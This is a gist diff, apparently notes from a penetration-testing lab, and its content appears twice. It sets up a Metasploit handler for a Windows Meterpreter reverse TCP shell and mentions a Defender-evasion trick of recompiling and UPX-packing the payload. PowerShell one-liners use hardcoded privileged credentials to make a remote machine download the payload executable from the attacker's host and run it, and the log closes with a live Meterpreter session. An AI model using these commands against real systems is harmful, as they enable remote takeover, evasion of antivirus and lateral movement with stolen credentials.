dualfade · March 26, 2019 05:43
diff --git a/gistfile1.txt b/gistfile1.txt
 MODIFIED VEIL HANDLER --
 msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc

 /*
 use exploit/multi/handler
 set PAYLOAD windows/x64/meterpreter/reverse_tcp
 set LHOST 10.10.14.13
 set LPORT 3434
 set ExitOnSession false
 exploit -j
 */

 WinDef / BitLoc EVASION TECHNIQUE --
 --> Mod x64 compile / upx brute compress <--
 https://github.com/cdowns71/stuffz/blob/master/codez/go/3fb7Jq79.go

 PRIV ESC / LATERAL MOVE
 PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k curl -sk http://10.10.14.13/3fb7Jq79.exe -o C:\Users\PrivUser\Downloads\3fb7Jq79.exe }

 PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k C:\Users\PrivUser\Downloads\3fb7Jq79.exe }

 SHELL --
 5:08:08 cdowns@7242-alpha-reticuli ~ msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc
 [*] Processing /var/lib/veil/output/handlers/3fb7Jq79.rc for ERB directives.
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> use exploit/multi/handler
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LHOST 10.10.14.13
 LHOST => 10.10.14.13
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LPORT 3434
 LPORT => 3434
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set ExitOnSession false
 ExitOnSession => false
 resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> exploit -j
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.

 [*] Started reverse TCP handler on 10.10.14.13:3434 
 msf5 exploit(multi/handler) > 
 [*] Sending stage (206403 bytes) to 10.10.10.130
 [*] Meterpreter session 1 opened (10.10.14.13:3434 -> 10.10.10.130:50048) at 2019-03-26 05:08:21 +0000

 msf5 exploit(multi/handler) > sessions -l

 Active sessions
 ===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  MACHINE\PrivUser @ MACHINE  10.10.14.13:3434 -> 10.10.10.130:50048 (10.10.10.130)

 msf5 exploit(multi/handler) >
	MODIFIED VEIL HANDLER --
	msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc

	/*
	use exploit/multi/handler
	set PAYLOAD windows/x64/meterpreter/reverse_tcp
	set LHOST 10.10.14.13
	set LPORT 3434
	set ExitOnSession false
	exploit -j
	*/

	WinDef / BitLoc EVASION TECHNIQUE --
	--> Mod x64 compile / upx brute compress <--
	https://github.com/cdowns71/stuffz/blob/master/codez/go/3fb7Jq79.go

	PRIV ESC / LATERAL MOVE
	PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k curl -sk http://10.10.14.13/3fb7Jq79.exe -o C:\Users\PrivUser\Downloads\3fb7Jq79.exe }

	PS C:\Users\UnPrivUser\Downloads> $username = 'PRIVUSER';$password = 'eRHptu86XTpjxUzt';$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;Invoke-Command -Credential $credential -ComputerName MACHINE -Command { cmd /k C:\Users\PrivUser\Downloads\3fb7Jq79.exe }

	SHELL --
	5:08:08 cdowns@7242-alpha-reticuli ~ msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc
	[*] Processing /var/lib/veil/output/handlers/3fb7Jq79.rc for ERB directives.
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> use exploit/multi/handler
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
	PAYLOAD => windows/x64/meterpreter/reverse_tcp
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LHOST 10.10.14.13
	LHOST => 10.10.14.13
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set LPORT 3434
	LPORT => 3434
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> set ExitOnSession false
	ExitOnSession => false
	resource (/var/lib/veil/output/handlers/3fb7Jq79.rc)> exploit -j
	[*] Exploit running as background job 0.
	[*] Exploit completed, but no session was created.

	[*] Started reverse TCP handler on 10.10.14.13:3434
	msf5 exploit(multi/handler) >
	[*] Sending stage (206403 bytes) to 10.10.10.130
	[*] Meterpreter session 1 opened (10.10.14.13:3434 -> 10.10.10.130:50048) at 2019-03-26 05:08:21 +0000

	msf5 exploit(multi/handler) > sessions -l

	Active sessions
	===============

	Id Name Type Information Connection
	-- ---- ---- ----------- ----------
	1 meterpreter x64/windows MACHINE\PrivUser @ MACHINE 10.10.14.13:3434 -> 10.10.10.130:50048 (10.10.10.130)

	msf5 exploit(multi/handler) >